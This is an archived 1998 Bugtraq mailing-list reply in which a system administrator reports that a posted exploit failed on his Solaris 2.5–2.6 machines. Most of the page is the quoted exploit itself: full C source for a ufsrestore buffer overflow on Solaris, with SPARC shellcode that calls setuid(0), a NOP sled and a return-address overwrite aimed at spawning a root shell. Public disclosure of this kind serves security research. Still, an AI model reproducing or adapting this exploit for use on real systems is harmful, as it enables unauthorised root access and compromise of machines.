OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
Bugtraq archives for 2nd quarter (Apr-Jun) 1998: Re: ufsrestore sparc exploit

Re: ufsrestore sparc exploit

Matt Glaves (glavesCS.ODU.EDU)
Thu, 11 Jun 1998 22:25:42 -0400

No luck on 2.5, 2.5.1 or 2.6 machines here.

Matt Glaves                                  System Administrator
glavescs.odu.edu                         Old Dominion University
http://www.cs.odu.edu/~glaves         Computer Science Department

On Thu, 11 Jun 1998, John McDonald wrote:

> well.. here is the source. :>
>
> I have not checked it on a patched machine.. guess I stumbled onto a
> different hole when playing with ufsrestore.
>
> humble
>
> // ufsrestore solaris 2.4, 2.5, 2.5.1, 2.6 exploit
> // by humble
> // thanks to plaguez for help
>
> #include <stdio.h>
> #include <stdlib.h>
> #include <sys/types.h>
> #include <unistd.h>
>
> #define BUF_LENGTH 300
> #define EXTRA 100
> #define STACK_OFFSET -600
> #define SPARC_NOP 0xac15a16e
>
> // normal shell code cept I added a bunch of sll's and add's
> // to get rid of a 2f '/' in there (from the sethi 0xbdcda, %l7)
> // I don't know sparc assembly so this might be dumb :P
>
> // also added code to do seteuid(0); setuid(0); from erik's buffer
> // overrun page
>
> u_char sparc_shellcode[] =
> "\x90\x08\x3f\xff\x82\x10\x20\x8d\x91\xd0\x20\x08"
> "\x90\x08\x3f\xff\x82\x10\x20\x17\x91\xd0\x20\x08"
>    "\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e"
>    "\xae\x10\x2b\xdc\xaf\x2d\xe0\x01\xae\x05\xe0\x01"
>    "\xaf\x2d\xe0\x01\xae\x05\xe0\x01\xaf\x2d\xe0\x01"
>    "\xaf\x2d\xe0\x01\xae\x05\xe0\x01\xaf\x2d\xe0\x01"
>    "\xae\x05\xe0\x01\xaf\x2d\xe0\x01\xaf\x2d\xe0\x01"
>    "\xae\x05\xe0\x01\xaf\x2d\xe0\x01\xaf\x2d\xe0\x0a"
>    "\x90\x0b\x80\x0e"
>    "\x92\x03\xa0\x08\x94\x1a\x80\x0a\x9c\x03\xa0\x10\xec\x3b\xbf\xf0"
>    "\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc\x82\x10\x20\x3b\x91\xd0\x20\x08"
>    "\x90\x1b\xc0\x0f\x82\x10\x20\x01\x91\xd0\x20\x08";
>
>    u_long get_sp(void)
>    {
>    __asm__("mov %sp,%i0 \n");
>    }
>
>    void main(int argc, char *argv[])
>    {
>    char buf[BUF_LENGTH + EXTRA + 8];
>    long targ_addr;
>    u_long *long_p;
>    u_char *char_p;
>    int i, code_length = strlen(sparc_shellcode),dso=0,a=0;
>
>    if(argc > 1) dso=atoi(argv[1]);
>
>    long_p =(u_long *) buf ;
>    targ_addr = get_sp() - STACK_OFFSET - dso;
>    for (i = 0; i < (BUF_LENGTH - code_length) / sizeof(u_long); i++)
>    *long_p++ = SPARC_NOP;
>
>    char_p = (u_char *) long_p;
>
>    for (i = 0; i < code_length; i++)
>    *char_p++ = sparc_shellcode[i];
>
>    long_p = (u_long *) char_p;
>
>    for (i = 0; i < EXTRA / sizeof(u_long); i++)
>    *long_p++ =targ_addr;
>
>    printf("Jumping to address 0x%lx B[%d] E[%d] SO[%d]\n",
>    targ_addr,BUF_LENGTH,EXTRA,STACK_OFFSET);
>    printf("hit ctrl-c and then type y\n");
>    execl("/usr/lib/fs/ufs/ufsrestore", &buf[4],"if", "-",(char *) 0);
>    perror("execl failed");
>    }
>